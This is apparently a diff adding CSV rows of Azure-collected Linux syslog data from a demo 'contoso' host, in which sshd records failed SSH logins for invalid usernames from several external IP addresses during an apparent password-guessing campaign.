+17685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:55,UbuntuDevEnv,2019-06-26 09:19:55,auth,UbuntuDevEnv,info,Failed password for invalid user server from 118.24.90.122 port 16476 ssh2,68988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,118.24.90.1,16476,,
+17686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:55,UbuntuDevEnv,2019-06-26 09:19:55,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 16476:11: Bye Bye [preauth],68988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,16476,,
+17687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:55,UbuntuDevEnv,2019-06-26 09:19:55,auth,UbuntuDevEnv,info,Disconnected from invalid user server 118.24.90.122 port 16476 [preauth],68988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,118.24.90.1,16476,,
+17688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:58,UbuntuDevEnv,2019-06-26 09:19:58,auth,UbuntuDevEnv,info,Invalid user fin from 165.22.203.187 port 40884,69024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fin,165.22.203.1,40884,,
+17689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:58,UbuntuDevEnv,2019-06-26 09:19:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,69024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:58,UbuntuDevEnv,2019-06-26 09:19:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:00,UbuntuDevEnv,2019-06-26 09:20:00,auth,UbuntuDevEnv,info,Failed password for invalid user fin from 165.22.203.187 port 40884 ssh2,69024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fin,165.22.203.1,40884,,
+17692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:00,UbuntuDevEnv,2019-06-26 09:20:00,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 40884:11: Bye Bye [preauth],69024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,40884,,
+17693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:00,UbuntuDevEnv,2019-06-26 09:20:00,auth,UbuntuDevEnv,info,Disconnected from invalid user fin 165.22.203.187 port 40884 [preauth],69024,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fin,165.22.203.1,40884,,
+17694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:11,UbuntuDevEnv,2019-06-26 09:20:11,auth,UbuntuDevEnv,info,Invalid user noc from 176.31.202.90 port 47578,69079,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,176.31.202.9,47578,,
+17695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:11,UbuntuDevEnv,2019-06-26 09:20:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69079,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:11,UbuntuDevEnv,2019-06-26 09:20:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,69079,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:14,UbuntuDevEnv,2019-06-26 09:20:13,auth,UbuntuDevEnv,info,Failed password for invalid user noc from 176.31.202.90 port 47578 ssh2,69079,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,176.31.202.9,47578,,
+17698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:14,UbuntuDevEnv,2019-06-26 09:20:13,auth,UbuntuDevEnv,info,Disconnected from invalid user noc 176.31.202.90 port 47578 [preauth],69079,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,176.31.202.9,47578,,
+17699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:14,UbuntuDevEnv,2019-06-26 09:20:13,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 47578:11: Bye Bye [preauth],69079,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,47578,,
+17700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:44,UbuntuDevEnv,2019-06-26 09:20:44,auth,UbuntuDevEnv,info,Connection closed by 118.24.90.122 port 23554 [preauth],69262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,23554,,
+17701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:50,UbuntuDevEnv,2019-06-26 09:20:50,auth,UbuntuDevEnv,info,Invalid user luke from 187.6.249.142 port 43296,69292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luke,187.6.249.1,43296,,
+17702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:50,UbuntuDevEnv,2019-06-26 09:20:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:50,UbuntuDevEnv,2019-06-26 09:20:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,69292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:52,UbuntuDevEnv,2019-06-26 09:20:52,auth,UbuntuDevEnv,info,Failed password for invalid user luke from 187.6.249.142 port 43296 ssh2,69292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luke,187.6.249.1,43296,,
+17705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:52,UbuntuDevEnv,2019-06-26 09:20:52,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 43296:11: Bye Bye [preauth],69292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,43296,,
+17706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:52,UbuntuDevEnv,2019-06-26 09:20:52,auth,UbuntuDevEnv,info,Disconnected from invalid user luke 187.6.249.142 port 43296 [preauth],69292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luke,187.6.249.1,43296,,
+17707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:56,UbuntuDevEnv,2019-06-26 09:20:55,auth,UbuntuDevEnv,info,Invalid user graham from 176.31.43.255 port 39520,69318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,graham,176.31.43.2,39520,,
+17708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:56,UbuntuDevEnv,2019-06-26 09:20:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:56,UbuntuDevEnv,2019-06-26 09:20:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,69318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:58,UbuntuDevEnv,2019-06-26 09:20:57,auth,UbuntuDevEnv,info,Failed password for invalid user graham from 176.31.43.255 port 39520 ssh2,69318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,graham,176.31.43.2,39520,,
+17711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:58,UbuntuDevEnv,2019-06-26 09:20:57,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 39520:11: Bye Bye [preauth],69318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,39520,,
+17712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:20:58,UbuntuDevEnv,2019-06-26 09:20:57,auth,UbuntuDevEnv,info,Disconnected from invalid user graham 176.31.43.255 port 39520 [preauth],69318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,graham,176.31.43.2,39520,,
+17713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:23,UbuntuDevEnv,2019-06-26 09:21:23,auth,UbuntuDevEnv,info,Invalid user webmin from 165.22.203.187 port 34494,69420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmin,165.22.203.1,34494,,
+17714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:23,UbuntuDevEnv,2019-06-26 09:21:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:23,UbuntuDevEnv,2019-06-26 09:21:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,69420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:26,UbuntuDevEnv,2019-06-26 09:21:25,auth,UbuntuDevEnv,info,Failed password for invalid user webmin from 165.22.203.187 port 34494 ssh2,69420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmin,165.22.203.1,34494,,
+17717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:26,UbuntuDevEnv,2019-06-26 09:21:25,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 34494:11: Bye Bye [preauth],69420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,34494,,
+17718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:26,UbuntuDevEnv,2019-06-26 09:21:25,auth,UbuntuDevEnv,info,Disconnected from invalid user webmin 165.22.203.187 port 34494 [preauth],69420,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmin,165.22.203.1,34494,,
+17719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:34,UbuntuDevEnv,2019-06-26 09:21:34,auth,UbuntuDevEnv,info,Connection closed by 118.24.90.122 port 30636 [preauth],69440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,30636,,
+17720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:38,UbuntuDevEnv,2019-06-26 09:21:38,auth,UbuntuDevEnv,info,Invalid user calude from 176.31.202.90 port 36148,69483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calude,176.31.202.9,36148,,
+17721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:38,UbuntuDevEnv,2019-06-26 09:21:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,69483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:38,UbuntuDevEnv,2019-06-26 09:21:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:41,UbuntuDevEnv,2019-06-26 09:21:40,auth,UbuntuDevEnv,info,Failed password for invalid user calude from 176.31.202.90 port 36148 ssh2,69483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calude,176.31.202.9,36148,,
+17724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:41,UbuntuDevEnv,2019-06-26 09:21:40,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 36148:11: Bye Bye [preauth],69483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,36148,,
+17725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:41,UbuntuDevEnv,2019-06-26 09:21:40,auth,UbuntuDevEnv,info,Disconnected from invalid user calude 176.31.202.90 port 36148 [preauth],69483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,calude,176.31.202.9,36148,,
+17726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:48,UbuntuDevEnv,2019-06-26 09:21:48,auth,UbuntuDevEnv,info,Invalid user steven from 45.55.190.46 port 41388,69443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steven,45.55.190.4,41388,,
+17727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:48,UbuntuDevEnv,2019-06-26 09:21:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:48,UbuntuDevEnv,2019-06-26 09:21:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,69443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+17729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:50,UbuntuDevEnv,2019-06-26 09:21:50,auth,UbuntuDevEnv,info,Failed password for invalid user steven from 45.55.190.46 port 41388 ssh2,69443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steven,45.55.190.4,41388,,
+17730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:51,UbuntuDevEnv,2019-06-26 09:21:51,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 41388:11: Bye Bye [preauth],69443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,41388,,
+17731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:21:51,UbuntuDevEnv,2019-06-26 09:21:51,auth,UbuntuDevEnv,info,Disconnected from invalid user steven 45.55.190.46 port 41388 [preauth],69443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steven,45.55.190.4,41388,,
+17732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:00,UbuntuDevEnv,2019-06-26 09:22:00,auth,UbuntuDevEnv,info,Connection closed by 115.159.216.187 port 37387 [preauth],69430,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,37387,,
+17733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:19,UbuntuDevEnv,2019-06-26 09:22:19,auth,UbuntuDevEnv,info,Invalid user vweru from 176.31.43.255 port 48330,69622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,176.31.43.2,48330,,
+17734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:19,UbuntuDevEnv,2019-06-26 09:22:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:19,UbuntuDevEnv,2019-06-26 09:22:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,69622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:21,UbuntuDevEnv,2019-06-26 09:22:21,auth,UbuntuDevEnv,info,Failed password for invalid user vweru from 176.31.43.255 port 48330 ssh2,69622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,176.31.43.2,48330,,
+17737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:21,UbuntuDevEnv,2019-06-26 09:22:21,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 48330:11: Bye Bye [preauth],69622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,48330,,
+17738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:21,UbuntuDevEnv,2019-06-26 09:22:21,auth,UbuntuDevEnv,info,Disconnected from invalid user vweru 176.31.43.255 port 48330 [preauth],69622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vweru,176.31.43.2,48330,,
+17739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:22,UbuntuDevEnv,2019-06-26 09:22:22,auth,UbuntuDevEnv,info,Invalid user rack from 118.24.90.122 port 37728,69627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rack,118.24.90.1,37728,,
+17740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:22,UbuntuDevEnv,2019-06-26 09:22:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,69627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+17741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:22,UbuntuDevEnv,2019-06-26 09:22:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,69627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:25,UbuntuDevEnv,2019-06-26 09:22:24,auth,UbuntuDevEnv,info,Failed password for invalid user rack from 118.24.90.122 port 37728 ssh2,69627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rack,118.24.90.1,37728,,
+17743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:25,UbuntuDevEnv,2019-06-26 09:22:24,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 37728:11: Bye Bye [preauth],69627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,37728,,
+17744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:22:25,UbuntuDevEnv,2019-06-26 09:22:24,auth,UbuntuDevEnv,info,Disconnected from invalid user rack 118.24.90.122 port 37728 [preauth],69627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rack,118.24.90.1,37728,,
